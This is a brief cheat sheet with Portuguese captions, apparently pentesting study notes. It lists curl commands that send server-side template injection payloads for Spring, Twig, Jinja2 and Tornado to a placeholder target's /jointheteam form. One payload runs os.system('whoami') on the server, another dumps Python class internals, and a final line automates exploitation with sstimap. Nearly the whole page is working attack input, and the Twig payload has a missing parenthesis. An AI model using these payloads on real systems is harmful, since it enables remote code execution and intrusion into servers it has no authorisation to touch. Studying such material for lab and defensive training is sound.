SSTI Exploitation Example 2
curl -X POST -d 'email=${7*7}' http://<TARGET IP>:<PORT>/jointheteam
Interagindo com o destino remoto (carga útil do Spring)
curl -X POST -d 'email={{_self.env.display("TEST"}}' http://<TARGET IP>:<PORT>/jointheteam
Interagindo com o alvo remoto (carga útil Twig)
curl -X POST -d 'email={{config.items()}}' http://<TARGET IP>:<PORT>/jointheteam
Interagindo com o alvo remoto (injeção básica Jinja2)
curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://<TARGET IP>:<PORT>/jointheteam
Interagindo com o alvo remoto (Jinja2 despeja toda a carga útil das classes)
curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam
Interagindo com o alvo remoto (carga útil do Tornado)
./sstimap.py -u 'http://<TARGET IP>:<PORT>/jointheteam' -d email=blah
Automatizando o processo de exploração com sstimap
Last updated